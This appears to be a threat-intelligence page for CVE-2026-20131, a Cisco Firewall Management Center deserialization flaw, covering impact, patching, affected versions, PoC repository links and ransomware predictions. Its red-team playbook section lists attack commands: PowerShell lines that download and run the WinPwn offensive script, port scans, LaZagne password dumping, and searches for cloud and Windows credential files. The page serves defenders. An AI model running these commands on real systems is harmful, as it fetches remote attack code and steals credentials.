CVE-2026-20131
Overview
This vulnerability is an insecure deserialization flaw in the web-based management interface of Cisco Secure Firewall Management Center (FMC). It arises from the unsafe processing of user-supplied serialized Java byte streams, allowing manipulation of the deserialization process. The affected component is the Java deserialization mechanism within the FMC's management interface, which improperly validates incoming serialized objects.
Vulnerability Description
A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to execute arbitrary Java code as root on an affected device. This vulnerability is due to insecure deserialization of a user-supplied Java byte stream. An attacker could exploit this vulnerability by sending a crafted serialized Java object to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. Note: If the FMC management interface does not have public internet access, the attack surface that is associated with this vulnerability is reduced.
Impact
An unauthenticated remote attacker can execute arbitrary Java code with root privileges on the affected FMC device, resulting in full system compromise. This includes the ability to execute arbitrary commands, modify configurations, and potentially disrupt firewall management operations. The vulnerability requires no authentication or user interaction and can be exploited remotely if the management interface is accessible, leading to critical business impacts such as loss of control over security infrastructure and data exposure.
Solution
Cisco has released security updates addressing this vulnerability in Cisco Secure Firewall Management Center versions 6.4.0.18 and later. Administrators should upgrade affected FMC installations to the fixed versions as detailed in Cisco Security Advisory cisco-sa-fmc-rce-NKhnULJh. If immediate patching is not feasible, restricting public internet access to the FMC management interface can reduce exposure. Refer to the Cisco advisory URL for comprehensive patching instructions and mitigation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the web-based management interface of Cisco Secure Firewall Management Center Software arises from insecure deserialization of user-supplied Java byte streams. This flaw allows an unauthenticated remote attacker to send a crafted serialized Java object to the management interface, leading to arbitrary code execution with root privileges on the affected device. The underlying issue stems from the way the software processes serialized objects without adequate validation, enabling malicious actors to manipulate the deserialization process. This vulnerability is particularly critical due to its potential to compromise the integrity and confidentiality of the entire firewall management system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could target devices that are directly accessible over the internet or those exposed through misconfigured network settings. Once the crafted Java object is sent to the management interface, the attacker can execute arbitrary code, potentially leading to full control over the device. This could include the installation of malware, data exfiltration, or further lateral movement within the network. The ease of exploitation, combined with the high privileges gained, makes this vulnerability particularly dangerous for organizations relying on Cisco's firewall management solutions.
The real-world impact of this vulnerability can be severe, posing significant business risks. Organizations that utilize Cisco Secure Firewall Management Center Software may find themselves exposed to data breaches, service disruptions, and reputational damage. The ability for an attacker to execute arbitrary code as root means that they could manipulate firewall rules, access sensitive information, or disrupt critical services. In a landscape where cybersecurity threats are increasingly sophisticated, the consequences of such a breach could lead to financial losses, regulatory penalties, and a loss of customer trust.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the firewall management software to the latest versions is crucial, as vendors typically release patches to address known vulnerabilities. Network segmentation can also reduce the attack surface by limiting access to the management interface from untrusted networks. Additionally, employing intrusion detection systems (IDS) can help identify suspicious activity related to deserialization attempts. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the vulnerability in Cisco Secure Firewall Management Center Software highlights the critical need for robust security practices in managing network infrastructure. The potential for remote code execution as root underscores the importance of secure coding practices, especially regarding deserialization processes. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities and protect their digital assets.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) for CVE-2026-20131, rising by over 100% in recent assessments. This uptick occurs despite a significant reduction in detection activity across our sensors, suggesting that while direct exploit attempts may be less frequently observed, the availability of new proof-of-concept exploits has broadened the exploitation landscape. The emergence of multiple publicly accessible exploit tools lowers the barrier for adversaries, including ransomware groups such as Akira, to leverage this critical vulnerability for remote code execution with root privileges. The increased EPSS score, now placing the vulnerability in a higher percentile of predicted exploitation likelihood, underscores an elevated risk profile. For defenders, this shift signals a growing potential for opportunistic attacks that could bypass traditional detection mechanisms, emphasizing the need for heightened vigilance. Consequently, the threat level associated with CVE-2026-20131 should be considered elevated, reflecting both the expanded exploit toolkit and the persistent interest from ransomware actors, even as telemetry indicates fewer direct exploit attempts.
Affected Products (71)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Secure Firewall Management Center | 6.4.0.13 |
cpe:2.3:a:cisco:secure_firewall_management_center:6.4.0.13:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 6.4.0.14 |
cpe:2.3:a:cisco:secure_firewall_management_center:6.4.0.14:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 6.4.0.15 |
cpe:2.3:a:cisco:secure_firewall_management_center:6.4.0.15:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 6.4.0.16 |
cpe:2.3:a:cisco:secure_firewall_management_center:6.4.0.16:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 6.4.0.17 |
cpe:2.3:a:cisco:secure_firewall_management_center:6.4.0.17:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 6.4.0.18 |
cpe:2.3:a:cisco:secure_firewall_management_center:6.4.0.18:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.0 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.0:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.0.1 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.0.1:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.1 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.1:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.1.1 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.1.1:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.2 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.2:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.2.1 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.2.1:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.3 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.3:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.4 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.4:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.5 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.5:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.6 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.6:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.6.1 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.6.1:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.6.2 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.6.2:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.6.3 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.6.3:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | 7.0.7 |
cpe:2.3:a:cisco:secure_firewall_management_center:7.0.7:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
sak110/CVE-2026-20131
|
sak110 | 3 | 1 | 2026-03-11 | View |
|
p3Nt3st3r-sTAr/CVE-2026-20131-POC
|
p3Nt3st3r-sTAr | 0 | 3 | 2026-03-06 | View |
|
Hassan-Pouladi/Cisco-FMC-honeypot
Originally a Honeypot for CVE-2026-20131
|
Hassan-Pouladi | 1 | 1 | 2026-04-07 | View |
|
Sushilsin/CVE-2026-20131
CVE-2026-20131 — Cisco FMC Insecure Java Deserialization (RCE)
|
Sushilsin | 1 | 1 | 2026-03-06 | View |
|
0xBlackash/CVE-2026-20131
CVE-2026-20131
|
0xBlackash | 0 | 0 | 2026-05-10 | View |
Threat Feed
26 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-20131 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-rce-NKhnULJh |
| aws.amazon.com |
NVD API
Technical Description
|
https://aws.amazon.com/blogs/security/amazon-threat-intelligence-teams-identify-interlock-ransomware-campaign-targeting-enterprise-firewalls/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-20131 |